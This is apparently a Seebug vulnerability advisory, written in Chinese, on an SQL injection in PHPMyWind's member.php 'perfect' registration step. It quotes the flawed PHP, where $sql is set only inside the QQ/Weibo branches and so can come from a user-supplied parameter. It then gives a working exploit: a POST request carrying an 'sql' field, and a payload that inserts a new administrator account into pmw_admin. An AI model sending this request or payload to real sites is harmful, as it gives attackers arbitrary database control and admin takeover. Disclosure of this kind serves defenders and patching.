PHPMyWind一个为所欲为的注入

2015-06-01T00:00:00
ID SSV:94771
Type seebug
Reporter Root
Modified 2015-06-01T00:00:00

Description

简要描述:

rt

详细说明:

PHPMyWind最新版 只需会员登录 即可进行任意sql操作 漏洞代码: /member.php 861-941行

`` else if($a == 'perfect') { //初始化参数 $username = empty($username) ? '' : $username; $password = empty($password) ? '' : md5(md5($password)); $repassword = empty($repassword) ? '' : md5(md5($repassword)); $email = empty($email) ? '' : $email; //验证输入数据 if($username == '' or $password == '' or $repassword == '' or $email == '') { header('location:?c=perfect'); exit(); } if($password != $repassword) { header('location:?c=perfect'); exit(); } $uname_len = strlen($username); $upwd_len = strlen($_POST['password']); if($uname_len<6 or $uname_len>16 or $upwd_len<6 or $upwd_len>16) { header('location:?c=perfect'); exit(); } if(preg_match("/[^0-9a-zA-Z_@!\.-]/",$username) or preg_match("/[^0-9a-zA-Z_-]/",$password) or !preg_match("/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)+$/", $email)) { header('location:?c=perfect'); exit(); } $r = $dosql->GetOne("SELECTidFROM#@__memberWHEREusername='$username'"); if(isset($r['id'])) { ShowMsg('用户名已存在!','-1'); exit(); } $r = $dosql->GetOne("SELECTidFROM#@__memberWHEREemail`='$email'"); if(isset($r['id'])) { ShowMsg('您填写的邮箱已被注册!','-1'); exit(); } //添加用户数据 $regtime = time(); $regip = GetIP();

if(check_app_login('qq'))
{
    $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'");
    if(isset($r['id']))
        ShowMsg('该QQ已与其他账号绑定!','-1');
    else
        $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')"; 
}
else if(check_app_login('weibo'))
{
    $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'");
    if(isset($r['id']))
        ShowMsg('该微博已与其他账号绑定!','-1');
    else
        $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')"; 
}

$dosql->ExecNoneQuery($sql);

```

主要代码

`` if(check_app_login('qq')) { $r = $dosql->GetOne("SELECTidFROM#@__memberWHEREqqid='".$_SESSION['app']['qq']['uid']."'"); if(isset($r['id'])) ShowMsg('该QQ已与其他账号绑定!','-1'); else $sql = "INSERT INTO#@__member(username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')"; } else if(check_app_login('weibo')) { $r = $dosql->GetOne("SELECTidFROM#@__memberWHEREqqid='".$_SESSION['app']['weibo']['idstr']."'"); if(isset($r['id'])) ShowMsg('该微博已与其他账号绑定!','-1'); else $sql = "INSERT INTO#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')"; }

$dosql->ExecNoneQuery($sql);

```

$sql 在if else if中才赋值 只需不进入2个条件即可
最后执行 很简单 完全操控所以语句

漏洞证明:

利用起来也很简单 注册个用户登录后发个如下的包即可 POST /phpmywind/member.php?a=perfect DATA username=123123123x&password=123123123&repassword=123123123&email=12312@qq.com&sql=xxxxx username email 不是注册过的就行 随便乱填

<img src="https://images.seebug.org/upload/201505/29181857ac9571535f1ec602f50222d151a99eac.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201505/2918190845405e089dd8a5f0671b19b5a5a3ef4a.jpg" alt="22.jpg" width="600" onerror="javascript:errimg(this);">

sql改成 insert into pmw_admin (username,password) values ((123456),md5(123456)) 即可创建一个 123456 密码123456的管理员账户